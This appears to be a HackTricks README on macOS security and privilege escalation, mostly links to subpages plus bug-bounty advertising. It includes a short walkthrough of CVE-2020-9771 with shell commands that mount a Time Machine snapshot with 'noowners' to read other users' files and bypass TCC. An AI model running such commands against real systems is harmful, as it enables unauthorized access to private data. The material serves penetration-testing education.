hacktricks/macos-hardening/macos-security-and-privilege-escalation
2023-09-20 23:11:26 +00:00
..
mac-os-architecture GITBOOK-4090: change request with no subject merged in GitBook 2023-09-20 23:11:26 +00:00
macos-apps-inspecting-debugging-and-fuzzing GITBOOK-4088: change request with no subject merged in GitBook 2023-09-19 22:52:16 +00:00
macos-files-folders-and-binaries GITBOOK-4078: change request with no subject merged in GitBook 2023-09-11 15:21:29 +00:00
macos-proces-abuse GITBOOK-4088: change request with no subject merged in GitBook 2023-09-19 22:52:16 +00:00
macos-security-protections GITBOOK-4088: change request with no subject merged in GitBook 2023-09-19 22:52:16 +00:00
macos-applefs.md GITBOOK-4075: change request with no subject merged in GitBook 2023-09-10 23:59:38 +00:00
macos-basic-objective-c.md GITBOOK-4078: change request with no subject merged in GitBook 2023-09-11 15:21:29 +00:00
macos-bypassing-firewalls.md GITBOOK-4010: change request with no subject merged in GitBook 2023-07-14 13:56:11 +00:00
macos-defensive-apps.md GITBOOK-3989: change request with no subject merged in GitBook 2023-06-17 14:26:50 +00:00
macos-dyld-hijacking-and-dyld_insert_libraries.md GITBOOK-4088: change request with no subject merged in GitBook 2023-09-19 22:52:16 +00:00
macos-file-extension-apps.md GITBOOK-3973: change request with no subject merged in GitBook 2023-06-10 11:06:21 +00:00
macos-protocols.md GITBOOK-3989: change request with no subject merged in GitBook 2023-06-17 14:26:50 +00:00
macos-users.md GITBOOK-3960: change request with no subject merged in GitBook 2023-06-01 11:07:04 +00:00
README.md GITBOOK-4075: change request with no subject merged in GitBook 2023-09-10 23:59:38 +00:00

macOS Security & Privilege Escalation

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

HackenProof is home to all crypto bug bounties.

Get rewarded without delays
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.

Get experience in web3 pentesting
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.

Become the web3 hacker legend
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.

Sign up on HackenProof start earning from your hacks!

{% embed url="https://hackenproof.com/register" %}

Basic MacOS

If you are not familiar with macOS, you should start learning the basics of macOS:

  • Special macOS files & permissions:

{% content-ref url="macos-files-folders-and-binaries/" %} macos-files-folders-and-binaries {% endcontent-ref %}

  • Common macOS users

{% content-ref url="macos-users.md" %} macos-users.md {% endcontent-ref %}

  • AppleFS

{% content-ref url="macos-applefs.md" %} macos-applefs.md {% endcontent-ref %}

  • The architecture of the kernel

{% content-ref url="mac-os-architecture/" %} mac-os-architecture {% endcontent-ref %}

  • Common macOS network services & protocols

{% content-ref url="macos-protocols.md" %} macos-protocols.md {% endcontent-ref %}

MacOS MDM

In companies macOS systems are highly probably going to be managed with a MDM. Therefore, from the perspective of an attacker is interesting to know how that works:

{% content-ref url="../macos-red-teaming/macos-mdm/" %} macos-mdm {% endcontent-ref %}

MacOS - Inspecting, Debugging and Fuzzing

{% content-ref url="macos-apps-inspecting-debugging-and-fuzzing/" %} macos-apps-inspecting-debugging-and-fuzzing {% endcontent-ref %}

MacOS Security Protections

{% content-ref url="macos-security-protections/" %} macos-security-protections {% endcontent-ref %}

Attack Surface

File Permissions

If a process running as root writes a file that can be controlled by a user, the user could abuse this to escalate privileges.
This could occur in the following situations:

  • File used was already created by a user (owned by the user)
  • File used is writable by the user because of a group
  • File used is inside a directory owned by the user (the user could create the file)
  • File used is inside a directory owned by root but user has write access over it because of a group (the user could create the file)

Being able to create a file that is going to be used by root, allows a user to take advantage of its content or even create symlinks/hardlinks to point it to another place.

For this kind of vulnerabilities don't forget to check vulnerable .pkg installers:

{% content-ref url="macos-files-folders-and-binaries/macos-installers-abuse.md" %} macos-installers-abuse.md {% endcontent-ref %}

Entitlements and Privileges abuse via process abuse

If a process can inject code in another process with better privileges or entitlements or contact it to perform privileges actions, he could escalate privileges and bypass defensive meassures such as Sandbox or TCC.

{% content-ref url="macos-proces-abuse/" %} macos-proces-abuse {% endcontent-ref %}

File Extension & URL scheme app handlers

Weird apps registered by file extensions could be abused and different applications can be register to open specific protocols

{% content-ref url="macos-file-extension-apps.md" %} macos-file-extension-apps.md {% endcontent-ref %}

MacOS Privilege Escalation

CVE-2020-9771 - mount_apfs TCC bypass and privilege escalation

Any user (even unprivileged ones) can create and mount a time machine snapshot an access ALL the files of that snapshot.
The only privileged needed is for the application used (like Terminal) to have Full Disk Access (FDA) access (kTCCServiceSystemPolicyAllfiles) which need to be granted by an admin.

{% code overflow="wrap" %}

# Create snapshot
tmutil localsnapshot

# List snapshots
tmutil listlocalsnapshots /
Snapshots for disk /:
com.apple.TimeMachine.2023-05-29-001751.local

# Generate folder to mount it
cd /tmp # I didn it from this folder
mkdir /tmp/snap

# Mount it, "noowners" will mount the folder so the current user can access everything
/sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap

# Access it
ls /tmp/snap/Users/admin_user # This will work

{% endcode %}

A more detailed explanation can be found in the original report.

Sensitive Information

{% content-ref url="macos-files-folders-and-binaries/macos-sensitive-locations.md" %} macos-sensitive-locations.md {% endcontent-ref %}

Linux Privesc

First of all, please note that most of the tricks about privilege escalation affecting Linux/Unix will affect also MacOS machines. So see:

{% content-ref url="../../linux-hardening/privilege-escalation/" %} privilege-escalation {% endcontent-ref %}

MacOS Defensive Apps

References

HackenProof is home to all crypto bug bounties.

Get rewarded without delays
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.

Get experience in web3 pentesting
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.

Become the web3 hacker legend
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.

Sign up on HackenProof start earning from your hacks!

{% embed url="https://hackenproof.com/register" %}

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥